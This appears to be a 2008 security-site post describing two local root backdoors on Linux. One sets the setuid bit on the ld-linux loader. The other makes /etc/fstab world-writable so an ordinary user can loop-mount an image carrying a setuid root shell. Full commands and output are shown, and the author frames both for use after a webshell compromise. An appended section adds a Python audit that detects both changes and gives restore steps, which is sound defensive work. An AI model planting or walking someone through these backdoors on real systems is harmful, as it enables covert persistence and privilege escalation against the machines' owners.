Two methods of leaving a local backdoor on Linux - Vulnerability Warning - Black Bar Safety Net

2008-09-17T00:00:00
ID MYHACK58:62200820409
Type myhack58
Reporter Anonymous
Modified 2008-09-17T00:00:00

Description

Method one: the setuid method, which in fact is not very stealthy. Look at the process:

    [root@localdomain lib]# ls -l |grep ld-linux
    lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
    lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2
    [root@localdomain lib]# chmod +s ld-linux.so.2
    [root@localdomain lib]# ls -l |grep ld-2.7.so
    -rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so
    lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
    [root@localdomain lib]#

Here we give the file /lib/ld-linux.so.2 the setuid attribute; on FC8 it points to ld-2.7.so, so it is that file which ends up with the bit set. Next, let's see how to use it.

Log in as an ordinary user and test the permissions:

    [xiaoyu@localdomain ~]$ whoami
    xiaoyu
    [xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`
    root
    [xiaoyu@localdomain ~]$

Heh, it's root. As for exactly how to get a root shell, think about that yourself; not everything needs to be spelled out. One point is certain, though: /lib/ld-linux.so.2 /bin/sh will not produce a root shell, because bash checks whether the EUID and the UID are equal... OK, enough said.

Method two:

Look at the process:

    [root@localdomain etc]# chmod a+w /etc/fstab
    [root@localdomain etc]#

With that, the backdoor is in place. This method is relatively XXOXX; probably few administrators know about it. Its use is demonstrated below:

    [xiaoyu@localdomain ~]$ ls -l /etc/fstab
    -rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab
    [xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab

Then upload a file from our own machine to the target machine; here we name it test.

    [xiaoyu@localdomain tmp]$ ls -l test
    -rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test
    [xiaoyu@localdomain tmp]$ mount test
    [xiaoyu@localdomain tmp]$ cd /mnt
    [xiaoyu@localdomain mnt]$ ls -l
    total 18
    drwx------ 2 root root 12288 2008-04-20 05:44 lost+found
    -rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root
    [xiaoyu@localdomain mnt]$ ./root
    sh-3.2#

As you can see, the ordinary user has been elevated to root. Heh. As for the test file, Baidu does not seem to have an upload function, so there is no way to pass it along.

Someone may say that a local backdoor is of no use, but think it through: a webshell can accomplish all of this....
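
As an added example (not part of the original article), here is a Python audit for the two changes described above: setuid/setgid bits on the dynamic loader, and an /etc/fstab that is world-writable or contains a user-mountable entry with the suid option. The loader path list and the function names are assumptions chosen for this illustration.

```python
import os
import stat

# Assumed common loader paths; the article's FC8 host uses /lib/ld-linux.so.2.
LOADER_PATHS = ("/lib/ld-linux.so.2", "/lib64/ld-linux-x86-64.so.2")
USER_OPTS = {"user", "users", "owner", "group"}

def mode_findings(path, mode):
    """Flag the two permission changes the article makes, given a path and its st_mode."""
    findings = []
    if mode & (stat.S_ISUID | stat.S_ISGID):
        findings.append(f"{path}: setuid/setgid bit set ({stat.filemode(mode)})")
    if mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable ({stat.filemode(mode)})")
    return findings

def fstab_findings(text):
    """Flag fstab entries an unprivileged user can mount with setuid bits honoured."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if line.strip().startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 4:
            continue
        opts = set(fields[3].split(","))
        # "user" normally implies nosuid; an explicit "suid" can override that,
        # so any user-mountable entry carrying "suid" is reported (order ignored).
        if opts & USER_OPTS and "suid" in opts:
            findings.append(f"fstab line {n}: {fields[0]} on {fields[1]} is user-mountable with suid")
    return findings

def audit(fstab="/etc/fstab", loaders=LOADER_PATHS):
    """Run both checks against the live system (or against paths supplied by the caller)."""
    findings = []
    for path in loaders:
        if os.path.exists(path):
            # os.stat follows symlinks, so the ld-2.7.so target is what gets checked
            findings += mode_findings(path, os.stat(path).st_mode)
    if os.path.exists(fstab):
        findings += mode_findings(fstab, os.stat(fstab).st_mode)
        with open(fstab) as fh:
            findings += fstab_findings(fh.read())
    return findings

if __name__ == "__main__":
    for finding in audit():
        print("FINDING:", finding)
```

Restoring the expected state is `chmod a-s` on the loader and mode 0644 on /etc/fstab, followed by a review of any fstab lines the audit reports.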